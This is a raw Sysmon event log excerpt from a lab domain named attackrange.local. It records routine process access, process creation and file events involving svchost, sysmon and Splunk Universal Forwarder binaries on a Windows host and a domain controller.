09:06:26.642{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977687Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.642{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977686Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.642{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977685Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.642{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977684Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.642{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977683Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.642{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977682Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.642{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977681Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.642{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977680Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.642{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8992-6151-9E79-00000000FD01}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977679Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.642{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8992-6151-9E79-00000000FD01}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977678Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.628{69CF5F33-8992-6151-9E79-00000000FD01}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000977677Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.205{69CF5F33-8991-6151-9D79-00000000FD01}24084016C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000977676Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.127{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E4C9666279DEC8D3F3CA93D21E848EF,SHA256=C5B014292CBA58877B7851D4C9A9B9508536659FCFABF620BF711F06E5D05855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049082Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:27.320{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D87559581D41E038B9AC107184C4A10,SHA256=0F400BA6B8C9CABDFB4EF725AB8ECCF06BD04466584C9B7CE34F3BC4B9C03BC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977708Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:27.658{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1FFA3422FE9BFB24D5354F0259AA48B5,SHA256=58270822F5FFA30C28EFF7DC23DE72D5E5FB63BA83CF2B7A9BB0E40B6B4C2A58,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977707Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:27.314{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8993-6151-9F79-00000000FD01}1064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977706Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:27.314{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977705Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:27.314{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977704Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:27.314{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977703Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:27.314{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977702Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:27.314{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977701Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:27.314{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977700Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:27.314{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977699Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:27.314{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977698Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:27.314{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977697Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:27.314{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8993-6151-9F79-00000000FD01}1064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977696Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:27.314{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8993-6151-9F79-00000000FD01}1064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977695Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:27.300{69CF5F33-8993-6151-9F79-00000000FD01}1064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 